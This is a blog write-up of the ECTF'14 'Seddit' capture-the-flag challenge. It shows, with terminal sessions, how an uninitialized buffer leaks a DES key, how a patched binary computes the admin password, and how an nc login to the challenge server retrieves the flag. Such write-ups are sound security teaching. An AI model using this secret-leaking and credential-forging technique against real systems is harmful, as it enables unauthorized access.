Blog


ECTF'14 was last weekend.
Here is my writeup for the exploitation 400 Seddit:

Seddit has opened a new service to share posts and links through command line. Check it out here.

Hint: A pinch of ____
nc 212.71.235.214 6000 


Lets open the tar and see what the file is.

$ file seddit.tar.gz 
seddit.tar.gz: gzip compressed data, from Unix, last modified: Sat Oct 18 19:24:04 2014
$ tar -xvf seddit.tar.gz 
seddit
$ file seddit
seddit: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8ef4bbb0d0d50aab01844f4ec1b310261844a202, stripped

Looks like it is a 64 bit ELF file.
Lets run it and see what it does.

$ chmod +x ./seddit
$ ./seddit
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? ^C



The program allows you to create an account, login, and make posts (which it seems you can't view again later).

Looking in IDA we can follow the string "flag" and see that if you log in as an admin and it will print the flag.



Looking at the login function, it appears to call a function with your entered username as an argument.



In here a key file is being opened.



And a buffer originally containing 'aaaaaaa' is being overwritten, and concatenates the key to it.



And finally DES encryption is used on the username using the concatenated key to encrypt it.



This is returned and compared to the entered password for the user to login. However, byte_6020C0 (which is the last salt entered when creating an account) is set to 0 before running the encrypt function for the admin.



So the encryption key is 'aaaaaaa' followed by what is read from the file. The next step is to leak the key. When cross-referencing the string, we find that it is also opened in the make post method. The other thing to note about the make post method is that var_50 is only initialized if you choose to make a text post. However, it is still printed.



When testing on the server, I find that it doesn't seem to leak anything useful.

What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content:  	@
##############################



Then we notice that the salt variable (byte_6020C0) is used here as well. If we increase the length by creating an account, we can successfully leak the key:

What would you like to do? 1

Enter username:asdf

Enter salt:1234567890abcdef 
Your password is: 6d39088cc5fb4495
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content: highsec
�[
##############################


So the key is 'highsec'. Now we just need to encrypt. To make sure we use the right encryption, we can patch the program using idaPatcher to allow us to create an account as admin.



Now we can make a keyfile containing 'highsec' and try to login with a salt of 'aaaaaaa'

$ echo "highsec" > key
$ ./sedditPatched
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 1

Enter username:admin

Enter salt:aaaaaaa
Your password is: 94140f8339377477
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4


The encryption results in `94140f8339377477` Now lets try that password on the real server:

$ nc 212.71.235.214 6000
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 2
Enter username:admin
Enter password:94140f8339377477

Logged in as admin! flag{Encryption_is_Not_a_silver_bullet}
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4



The flag is `Encryption_is_Not_a_silver_bullet`